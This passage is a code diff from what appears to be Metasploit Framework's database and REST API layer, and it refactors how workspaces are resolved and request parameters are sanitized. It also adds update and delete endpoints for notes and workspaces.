@ -193,10 +183,7 @@ module Msf::DBManager::Host
|
||||||
end
|
end
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
ret = { }
|
ret = { }
|
||||||
|
|
||||||
|
@ -280,14 +267,11 @@ module Msf::DBManager::Host
|
||||||
end
|
end
|
||||||
|
|
||||||
def update_host(opts)
|
def update_host(opts)
|
||||||
# process workspace string for update if included in opts
|
|
||||||
wspace = opts.delete(:workspace)
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
opts[:workspace] = wspace
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
# process workspace string for update if included in opts
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||||
|
opts[:workspace] = wspace if wspace
|
||||||
|
|
||||||
id = opts.delete(:id)
|
id = opts.delete(:id)
|
||||||
Mdm::Host.update(id, opts)
|
Mdm::Host.update(id, opts)
|
||||||
}
|
}
|
||||||
|
@ -299,115 +283,4 @@ module Msf::DBManager::Host
|
||||||
return [] if flavor_match.nil?
|
return [] if flavor_match.nil?
|
||||||
["Windows", flavor_match.captures.first]
|
["Windows", flavor_match.captures.first]
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Update a host's attributes via semi-standardized sysinfo hash (Meterpreter)
|
|
||||||
#
|
|
||||||
# The opts parameter MUST contain the following entries
|
|
||||||
# +:host+:: -- the host's ip address
|
|
||||||
# +:info+:: -- the information hash
|
|
||||||
# * 'Computer' -- the host name
|
|
||||||
# * 'OS' -- the operating system string
|
|
||||||
# * 'Architecture' -- the hardware architecture
|
|
||||||
# * 'System Language' -- the system language
|
|
||||||
#
|
|
||||||
# The opts parameter can contain:
|
|
||||||
# +:workspace+:: -- the workspace for this host
|
|
||||||
#
|
|
||||||
def update_host_via_sysinfo(opts)
|
|
||||||
|
|
||||||
return if !active
|
|
||||||
addr = opts.delete(:host) || return
|
|
||||||
info = opts.delete(:info) || return
|
|
||||||
|
|
||||||
# Sometimes a host setup through a pivot will see the address as "Remote Pipe"
|
|
||||||
if addr.eql? "Remote Pipe"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
wspace = opts.delete(:workspace) || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
if !addr.kind_of? ::Mdm::Host
|
|
||||||
addr = Msf::Util::Host.normalize_host(addr)
|
|
||||||
addr, scope = addr.split('%', 2)
|
|
||||||
opts[:scope] = scope if scope
|
|
||||||
|
|
||||||
unless ipv46_validator(addr)
|
|
||||||
raise ::ArgumentError, "Invalid IP address in report_host(): #{addr}"
|
|
||||||
end
|
|
||||||
|
|
||||||
if opts[:comm] and opts[:comm].length > 0
|
|
||||||
host = wspace.hosts.where(address: addr, comm: opts[:comm]).first_or_initialize
|
|
||||||
else
|
|
||||||
host = wspace.hosts.where(address: addr).first_or_initialize
|
|
||||||
end
|
|
||||||
else
|
|
||||||
host = addr
|
|
||||||
end
|
|
||||||
|
|
||||||
ostate = host.state
|
|
||||||
|
|
||||||
res = {}
|
|
||||||
|
|
||||||
if info['Computer']
|
|
||||||
res[:name] = info['Computer']
|
|
||||||
end
|
|
||||||
|
|
||||||
if info['Architecture']
|
|
||||||
res[:arch] = info['Architecture'].split(/\s+/).first
|
|
||||||
end
|
|
||||||
|
|
||||||
if info['OS'] =~ /^Windows\s*([^\(]+)\(([^\)]+)\)/i
|
|
||||||
res[:os_name] = "Windows"
|
|
||||||
res[:os_flavor] = $1.strip
|
|
||||||
build = $2.strip
|
|
||||||
|
|
||||||
if build =~ /Service Pack (\d+)/
|
|
||||||
res[:os_sp] = "SP" + $1
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
if info["System Language"]
|
|
||||||
case info["System Language"]
|
|
||||||
when /^en_/
|
|
||||||
res[:os_lang] = "English"
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
# Truncate the info field at the maximum field length
|
|
||||||
if res[:info]
|
|
||||||
res[:info] = res[:info][0,65535]
|
|
||||||
end
|
|
||||||
|
|
||||||
# Truncate the name field at the maximum field length
|
|
||||||
if res[:name]
|
|
||||||
res[:name] = res[:name][0,255]
|
|
||||||
end
|
|
||||||
|
|
||||||
res.each do |k,v|
|
|
||||||
if (host.attribute_names.include?(k.to_s))
|
|
||||||
unless host.attribute_locked?(k.to_s)
|
|
||||||
host[k] = v.to_s.gsub(/[\x00-\x1f]/n, '')
|
|
||||||
end
|
|
||||||
elsif !v.blank?
|
|
||||||
dlog("Unknown attribute for Host: #{k}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
# Set default fields if needed
|
|
||||||
host.state = Msf::HostState::Alive if !host.state
|
|
||||||
host.comm = '' if !host.comm
|
|
||||||
host.workspace = wspace if !host.workspace
|
|
||||||
|
|
||||||
host.save! if host.changed?
|
|
||||||
host_state_changed(host, ostate) if host.state != ostate
|
|
||||||
|
|
||||||
host
|
|
||||||
}
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -6,13 +6,9 @@ module Msf::DBManager::HostTag
|
||||||
raise Msf::DBImportError.new("Missing required option :name") unless name
|
raise Msf::DBImportError.new("Missing required option :name") unless name
|
||||||
addr = opts.delete(:addr)
|
addr = opts.delete(:addr)
|
||||||
raise Msf::DBImportError.new("Missing required option :addr") unless addr
|
raise Msf::DBImportError.new("Missing required option :addr") unless addr
|
||||||
wspace = opts.delete(:wspace)
|
|
||||||
raise Msf::DBImportError.new("Missing required option :wspace") unless wspace
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
if wspace.kind_of? String
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
wspace = find_workspace(wspace)
|
raise Msf::DBImportError.new("Missing required option :wspace") unless wspace
|
||||||
end
|
|
||||||
|
|
||||||
host = nil
|
host = nil
|
||||||
report_host(:workspace => wspace, :address => addr)
|
report_host(:workspace => wspace, :address => addr)
|
||||||
|
|
||||||
|
|
|
@ -23,7 +23,8 @@ module HostServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
data = get_db().hosts(params.symbolize_keys)
|
sanitized_params = sanitize_params(params)
|
||||||
|
data = get_db.hosts(sanitized_params)
|
||||||
includes = [:loots]
|
includes = [:loots]
|
||||||
set_json_response(data, includes)
|
set_json_response(data, includes)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
|
@ -36,7 +37,7 @@ module HostServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
job = lambda { |opts|
|
job = lambda { |opts|
|
||||||
data = get_db().report_host(opts)
|
data = get_db.report_host(opts)
|
||||||
}
|
}
|
||||||
exec_report_job(request, &job)
|
exec_report_job(request, &job)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
|
@ -49,9 +50,9 @@ module HostServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
tmp_params = params.symbolize_keys
|
tmp_params = sanitize_params(params)
|
||||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||||
data = get_db().update_host(opts)
|
data = get_db.update_host(opts)
|
||||||
set_json_response(data)
|
set_json_response(data)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
set_error_on_response(e)
|
set_error_on_response(e)
|
||||||
|
@ -63,7 +64,7 @@ module HostServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
data = get_db().delete_host(opts)
|
data = get_db.delete_host(opts)
|
||||||
set_json_response(data)
|
set_json_response(data)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
set_error_on_response(e)
|
set_error_on_response(e)
|
||||||
|
|
|
@ -23,7 +23,8 @@ module LootServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
data = get_db().loots(params.symbolize_keys)
|
sanitized_params = sanitize_params(params)
|
||||||
|
data = get_db.loots(sanitized_params)
|
||||||
includes = [:host]
|
includes = [:host]
|
||||||
data.each do |loot|
|
data.each do |loot|
|
||||||
loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
|
loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
|
||||||
|
@ -45,7 +46,7 @@ module LootServlet
|
||||||
opts[:data] = Base64.urlsafe_decode64(opts[:data])
|
opts[:data] = Base64.urlsafe_decode64(opts[:data])
|
||||||
end
|
end
|
||||||
|
|
||||||
get_db().report_loot(opts)
|
get_db.report_loot(opts)
|
||||||
}
|
}
|
||||||
exec_report_job(request, &job)
|
exec_report_job(request, &job)
|
||||||
}
|
}
|
||||||
|
@ -55,9 +56,9 @@ module LootServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
tmp_params = params.symbolize_keys
|
tmp_params = sanitize_params(params)
|
||||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||||
data = get_db().update_loot(opts)
|
data = get_db.update_loot(opts)
|
||||||
set_json_response(data)
|
set_json_response(data)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
set_error_on_response(e)
|
set_error_on_response(e)
|
||||||
|
@ -69,7 +70,7 @@ module LootServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
data = get_db().delete_loot(opts)
|
data = get_db.delete_loot(opts)
|
||||||
set_json_response(data)
|
set_json_response(data)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
set_error_on_response(e)
|
set_error_on_response(e)
|
||||||
|
|
|
@ -4,18 +4,71 @@ module NoteServlet
|
||||||
'/api/v1/notes'
|
'/api/v1/notes'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def self.api_path_with_id
|
||||||
|
"#{NoteServlet.api_path}/?:id?"
|
||||||
|
end
|
||||||
|
|
||||||
def self.registered(app)
|
def self.registered(app)
|
||||||
|
app.get NoteServlet.api_path_with_id, &get_note
|
||||||
app.post NoteServlet.api_path, &report_note
|
app.post NoteServlet.api_path, &report_note
|
||||||
|
app.put NoteServlet.api_path_with_id, &update_note
|
||||||
|
app.delete NoteServlet.api_path, &delete_note
|
||||||
end
|
end
|
||||||
|
|
||||||
#######
|
#######
|
||||||
private
|
private
|
||||||
#######
|
#######
|
||||||
|
|
||||||
|
def self.get_note
|
||||||
|
lambda {
|
||||||
|
begin
|
||||||
|
opts = parse_json_request(request, false)
|
||||||
|
sanitized_params = sanitize_params(params)
|
||||||
|
data = get_db.notes(sanitized_params)
|
||||||
|
includes = [:host]
|
||||||
|
set_json_response(data, includes)
|
||||||
|
rescue Exception => e
|
||||||
|
set_error_on_response(e)
|
||||||
|
end
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
def self.report_note
|
def self.report_note
|
||||||
lambda {
|
lambda {
|
||||||
job = lambda { |opts| get_db().report_note(opts) }
|
begin
|
||||||
|
job = lambda { |opts|
|
||||||
|
get_db.report_note(opts)
|
||||||
|
}
|
||||||
exec_report_job(request, &job)
|
exec_report_job(request, &job)
|
||||||
|
rescue Exception => e
|
||||||
|
set_error_on_response(e)
|
||||||
|
end
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
def self.update_note
|
||||||
|
lambda {
|
||||||
|
begin
|
||||||
|
opts = parse_json_request(request, false)
|
||||||
|
tmp_params = sanitize_params(params)
|
||||||
|
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||||
|
data = get_db.update_note(opts)
|
||||||
|
set_json_response(data)
|
||||||
|
rescue Exception => e
|
||||||
|
set_error_on_response(e)
|
||||||
|
end
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
def self.delete_note
|
||||||
|
lambda {
|
||||||
|
begin
|
||||||
|
opts = parse_json_request(request, false)
|
||||||
|
data = get_db.delete_note(opts)
|
||||||
|
set_json_response(data)
|
||||||
|
rescue Exception => e
|
||||||
|
set_error_on_response(e)
|
||||||
|
end
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -22,7 +22,7 @@ module ServiceServlet
|
||||||
def self.get_services
|
def self.get_services
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = params.symbolize_keys
|
opts = sanitize_params(params)
|
||||||
data = get_db.services(opts)
|
data = get_db.services(opts)
|
||||||
includes = [:host]
|
includes = [:host]
|
||||||
set_json_response(data, includes)
|
set_json_response(data, includes)
|
||||||
|
@ -44,7 +44,7 @@ module ServiceServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
tmp_params = params.symbolize_keys
|
tmp_params = sanitize_params(params)
|
||||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||||
data = get_db.update_service(opts)
|
data = get_db.update_service(opts)
|
||||||
set_json_response(data)
|
set_json_response(data)
|
||||||
|
|
|
@ -34,7 +34,8 @@ module VulnAttemptServlet
|
||||||
begin
|
begin
|
||||||
job = lambda { |opts|
|
job = lambda { |opts|
|
||||||
vuln_id = opts.delete(:vuln_id)
|
vuln_id = opts.delete(:vuln_id)
|
||||||
vuln = get_db.vulns(id: vuln_id).first
|
wspace = opts.delete(:workspace)
|
||||||
|
vuln = get_db.vulns(id: vuln_id, workspace: wspace).first
|
||||||
get_db.report_vuln_attempt(vuln, opts)
|
get_db.report_vuln_attempt(vuln, opts)
|
||||||
}
|
}
|
||||||
exec_report_job(request, &job)
|
exec_report_job(request, &job)
|
||||||
|
|
|
@ -23,7 +23,8 @@ module VulnServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
data = get_db.vulns(params.symbolize_keys)
|
sanitized_params = sanitize_params(params)
|
||||||
|
data = get_db.vulns(sanitized_params)
|
||||||
includes = [:host, :vulns_refs, :refs, :module_refs]
|
includes = [:host, :vulns_refs, :refs, :module_refs]
|
||||||
set_json_response(data, includes)
|
set_json_response(data, includes)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
|
@ -49,7 +50,7 @@ module VulnServlet
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, false)
|
opts = parse_json_request(request, false)
|
||||||
tmp_params = params.symbolize_keys
|
tmp_params = sanitize_params(params)
|
||||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||||
data = get_db.update_vuln(opts)
|
data = get_db.update_vuln(opts)
|
||||||
set_json_response(data)
|
set_json_response(data)
|
||||||
|
|
|
@ -4,10 +4,15 @@ module WorkspaceServlet
|
||||||
'/api/v1/workspaces'
|
'/api/v1/workspaces'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def self.api_path_with_id
|
||||||
|
"#{WorkspaceServlet.api_path}/?:id?"
|
||||||
|
end
|
||||||
|
|
||||||
def self.registered(app)
|
def self.registered(app)
|
||||||
app.get WorkspaceServlet.api_path, &get_workspace
|
app.get WorkspaceServlet.api_path_with_id, &get_workspace
|
||||||
app.get WorkspaceServlet.api_path + '/counts', &get_workspace_counts
|
|
||||||
app.post WorkspaceServlet.api_path, &add_workspace
|
app.post WorkspaceServlet.api_path, &add_workspace
|
||||||
|
app.put WorkspaceServlet.api_path_with_id, &update_workspace
|
||||||
|
app.delete WorkspaceServlet.api_path, &delete_workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
#######
|
#######
|
||||||
|
@ -17,14 +22,10 @@ module WorkspaceServlet
|
||||||
def self.get_workspace
|
def self.get_workspace
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, true)
|
opts = parse_json_request(request, false)
|
||||||
includes = nil
|
includes = nil
|
||||||
if (opts[:all])
|
sanitized_params = sanitize_params(params)
|
||||||
data = get_db().workspaces
|
data = get_db.workspaces(sanitized_params)
|
||||||
#includes = 'hosts: {only: :count}, services: {only: :count}, vulns: {only: :count}, creds: {only: :count}, loots: {only: :count}, notes: {only: :count}'
|
|
||||||
else
|
|
||||||
data = get_db().find_workspace(opts[:workspace_name])
|
|
||||||
end
|
|
||||||
|
|
||||||
set_json_response(data, includes)
|
set_json_response(data, includes)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
|
@ -33,25 +34,41 @@ module WorkspaceServlet
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
def self.get_workspace_counts
|
|
||||||
lambda {
|
|
||||||
begin
|
|
||||||
set_json_response(get_db().workspace_associations_counts)
|
|
||||||
rescue Exception => e
|
|
||||||
set_error_on_response(e)
|
|
||||||
end
|
|
||||||
}
|
|
||||||
end
|
|
||||||
|
|
||||||
def self.add_workspace
|
def self.add_workspace
|
||||||
lambda {
|
lambda {
|
||||||
begin
|
begin
|
||||||
opts = parse_json_request(request, true)
|
opts = parse_json_request(request, true)
|
||||||
workspace = get_db().add_workspace(opts[:workspace_name])
|
workspace = get_db.add_workspace(opts)
|
||||||
set_json_response(workspace)
|
set_json_response(workspace)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
set_error_on_response(e)
|
set_error_on_response(e)
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def self.update_workspace
|
||||||
|
lambda {
|
||||||
|
begin
|
||||||
|
opts = parse_json_request(request, false)
|
||||||
|
tmp_params = sanitize_params(params)
|
||||||
|
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||||
|
data = get_db.update_workspace(opts)
|
||||||
|
set_json_response(data)
|
||||||
|
rescue Exception => e
|
||||||
|
set_error_on_response(e)
|
||||||
|
end
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
def self.delete_workspace
|
||||||
|
lambda {
|
||||||
|
begin
|
||||||
|
opts = parse_json_request(request, false)
|
||||||
|
data = get_db.delete_workspaces(opts)
|
||||||
|
set_json_response(data)
|
||||||
|
rescue Exception => e
|
||||||
|
set_error_on_response(e)
|
||||||
|
end
|
||||||
|
}
|
||||||
|
end
|
||||||
end
|
end
|
|
@ -12,7 +12,7 @@ module ServletHelper
|
||||||
[500, headers, error.message]
|
[500, headers, error.message]
|
||||||
end
|
end
|
||||||
|
|
||||||
def set_empty_response()
|
def set_empty_response
|
||||||
[200, '']
|
[200, '']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -41,7 +41,7 @@ module ServletHelper
|
||||||
exec_async = opts.delete(:exec_async)
|
exec_async = opts.delete(:exec_async)
|
||||||
if (exec_async)
|
if (exec_async)
|
||||||
JobProcessor.instance.submit_job(opts, &job)
|
JobProcessor.instance.submit_job(opts, &job)
|
||||||
return set_empty_response()
|
return set_empty_response
|
||||||
else
|
else
|
||||||
data = job.call(opts)
|
data = job.call(opts)
|
||||||
return set_json_response(data, includes)
|
return set_json_response(data, includes)
|
||||||
|
@ -52,10 +52,19 @@ module ServletHelper
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_db()
|
def get_db
|
||||||
DBManagerProxy.instance.db
|
DBManagerProxy.instance.db
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Sinatra injects extra parameters for some reason: https://github.com/sinatra/sinatra/issues/453
|
||||||
|
# This method cleans those up so we don't have any unexpected values before passing on.
|
||||||
|
#
|
||||||
|
# @param [Hash] params Hash containing the parameters for the request.
|
||||||
|
# @return [Hash] Returns params with symbolized keys and the injected parameters removed.
|
||||||
|
def sanitize_params(params)
|
||||||
|
params.symbolize_keys.except(:captures, :splat)
|
||||||
|
end
|
||||||
|
|
||||||
#######
|
#######
|
||||||
private
|
private
|
||||||
#######
|
#######
|
||||||
|
|
|
@ -16,7 +16,7 @@ module Msf::DBManager::Import::Nmap
|
||||||
# that. Otherwise, you'll hit the old NmapXMLStreamParser.
|
# that. Otherwise, you'll hit the old NmapXMLStreamParser.
|
||||||
def import_nmap_xml(args={}, &block)
|
def import_nmap_xml(args={}, &block)
|
||||||
return nil if args[:data].nil? or args[:data].empty?
|
return nil if args[:data].nil? or args[:data].empty?
|
||||||
wspace = args[:wspace] || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(args, framework)
|
||||||
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
|
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
|
||||||
|
|
||||||
if Rex::Parser.nokogiri_loaded
|
if Rex::Parser.nokogiri_loaded
|
||||||
|
@ -241,7 +241,6 @@ module Msf::DBManager::Import::Nmap
|
||||||
#
|
#
|
||||||
def import_nmap_xml_file(args={})
|
def import_nmap_xml_file(args={})
|
||||||
filename = args[:filename]
|
filename = args[:filename]
|
||||||
wspace = args[:wspace] || workspace
|
|
||||||
|
|
||||||
data = ""
|
data = ""
|
||||||
::File.open(filename, 'rb') do |f|
|
::File.open(filename, 'rb') do |f|
|
||||||
|
|
|
@ -1,19 +1,4 @@
|
||||||
module Msf::DBManager::Loot
|
module Msf::DBManager::Loot
|
||||||
#
|
|
||||||
# Loot collection
|
|
||||||
#
|
|
||||||
#
|
|
||||||
# This method iterates the loot table calling the supplied block with the
|
|
||||||
# instance of each entry.
|
|
||||||
#
|
|
||||||
def each_loot(wspace=workspace, &block)
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
wspace.loots.each do |note|
|
|
||||||
block.call(note)
|
|
||||||
end
|
|
||||||
}
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Find or create a loot matching this type/data
|
# Find or create a loot matching this type/data
|
||||||
#
|
#
|
||||||
|
@ -25,14 +10,12 @@ module Msf::DBManager::Loot
|
||||||
# This methods returns a list of all loot in the database
|
# This methods returns a list of all loot in the database
|
||||||
#
|
#
|
||||||
def loots(opts)
|
def loots(opts)
|
||||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
opts[:workspace_id] = wspace.id
|
|
||||||
search_term = opts.delete(:search_term)
|
search_term = opts.delete(:search_term)
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
opts[:workspace_id] = wspace.id
|
||||||
|
|
||||||
if search_term && !search_term.empty?
|
if search_term && !search_term.empty?
|
||||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Loot, search_term)
|
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Loot, search_term)
|
||||||
Mdm::Loot.includes(:host).where(opts).where(column_search_conditions)
|
Mdm::Loot.includes(:host).where(opts).where(column_search_conditions)
|
||||||
|
@ -46,10 +29,7 @@ module Msf::DBManager::Loot
|
||||||
def report_loot(opts)
|
def report_loot(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
path = opts.delete(:path) || (raise RuntimeError, "A loot :path is required")
|
path = opts.delete(:path) || (raise RuntimeError, "A loot :path is required")
|
||||||
|
|
||||||
host = nil
|
host = nil
|
||||||
|
@ -101,13 +81,10 @@ module Msf::DBManager::Loot
|
||||||
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||||
# @return [Mdm::Loot] The updated Mdm::Loot object.
|
# @return [Mdm::Loot] The updated Mdm::Loot object.
|
||||||
def update_loot(opts)
|
def update_loot(opts)
|
||||||
wspace = opts.delete(:workspace)
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
opts[:workspace] = wspace
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||||
|
opts[:workspace] = wspace if wspace
|
||||||
|
|
||||||
id = opts.delete(:id)
|
id = opts.delete(:id)
|
||||||
Mdm::Loot.update(id, opts)
|
Mdm::Loot.update(id, opts)
|
||||||
}
|
}
|
||||||
|
|
|
@ -3,7 +3,7 @@ module Msf::DBManager::Note
|
||||||
# This method iterates the notes table calling the supplied block with the
|
# This method iterates the notes table calling the supplied block with the
|
||||||
# note instance of each entry.
|
# note instance of each entry.
|
||||||
#
|
#
|
||||||
def each_note(wspace=workspace, &block)
|
def each_note(wspace=framework.db.workspace, &block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.notes.each do |note|
|
wspace.notes.each do |note|
|
||||||
block.call(note)
|
block.call(note)
|
||||||
|
@ -21,10 +21,20 @@ module Msf::DBManager::Note
|
||||||
#
|
#
|
||||||
# This methods returns a list of all notes in the database
|
# This methods returns a list of all notes in the database
|
||||||
#
|
#
|
||||||
def notes(wspace=workspace)
|
def notes(opts)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.notes
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
}
|
|
||||||
|
search_term = opts.delete(:search_term)
|
||||||
|
results = wspace.notes.includes(:host).where(opts)
|
||||||
|
if search_term && !search_term.empty?
|
||||||
|
re_search_term = /#{search_term}/mi
|
||||||
|
results = results.select { |note|
|
||||||
|
note.attribute_names.any? { |a| note[a.intern].to_s.match(re_search_term) }
|
||||||
|
}
|
||||||
|
end
|
||||||
|
results
|
||||||
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -55,10 +65,7 @@ module Msf::DBManager::Note
|
||||||
def report_note(opts)
|
def report_note(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
seen = opts.delete(:seen) || false
|
seen = opts.delete(:seen) || false
|
||||||
crit = opts.delete(:critical) || false
|
crit = opts.delete(:critical) || false
|
||||||
host = nil
|
host = nil
|
||||||
|
@ -110,13 +117,7 @@ module Msf::DBManager::Note
|
||||||
elsif opts[:service] and opts[:service].kind_of? ::Mdm::Service
|
elsif opts[:service] and opts[:service].kind_of? ::Mdm::Service
|
||||||
service = opts[:service]
|
service = opts[:service]
|
||||||
end
|
end
|
||||||
=begin
|
|
||||||
if host
|
|
||||||
host.updated_at = host.created_at
|
|
||||||
host.state = HostState::Alive
|
|
||||||
host.save!
|
|
||||||
end
|
|
||||||
=end
|
|
||||||
ntype = opts.delete(:type) || opts.delete(:ntype) || (raise RuntimeError, "A note :type or :ntype is required")
|
ntype = opts.delete(:type) || opts.delete(:ntype) || (raise RuntimeError, "A note :type or :ntype is required")
|
||||||
data = opts[:data]
|
data = opts[:data]
|
||||||
note = nil
|
note = nil
|
||||||
|
@ -171,4 +172,42 @@ module Msf::DBManager::Note
|
||||||
ret[:note] = note
|
ret[:note] = note
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Update the attributes of a note entry with the values in opts.
|
||||||
|
# The values in opts should match the attributes to update.
|
||||||
|
#
|
||||||
|
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||||
|
# @return [Mdm::Note] The updated Mdm::Note object.
|
||||||
|
def update_note(opts)
|
||||||
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||||
|
opts[:workspace] = wspace if wspace
|
||||||
|
|
||||||
|
id = opts.delete(:id)
|
||||||
|
Mdm::Note.update(id, opts)
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
# Deletes note entries based on the IDs passed in.
